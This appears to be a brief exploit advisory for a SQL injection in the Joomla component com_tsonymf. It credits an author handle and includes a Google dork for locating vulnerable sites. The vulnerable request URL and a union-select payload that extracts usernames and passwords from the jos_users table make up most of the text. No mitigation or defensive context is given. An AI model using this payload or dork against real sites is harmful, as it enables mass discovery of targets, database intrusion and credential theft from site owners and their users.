################################################################################################ # Exploit Title: Joomla Component (com_tsonymf) SQL Injection Vulnerability # # Author : CoBRa_21 # # E-Mail : uyku_cu [at] windowslive.com # # Google Dork : inurl:com_tsonymf # # Status : High-Risk # # Script Page : null # ################################################################################################ # # SQL Vulnerability # # http://127.0.0.1/[PATH]/index.php?option=com_tsonymf&controller=fpage&task=flypage&idofitem=162 (SQL) # # SQL Exploit # # +union+select+0,1,group_concat(username,0x3a,password)+from+jos_users # ################################################################################################ # ( Vulnerability Researcher ) ################################################################################################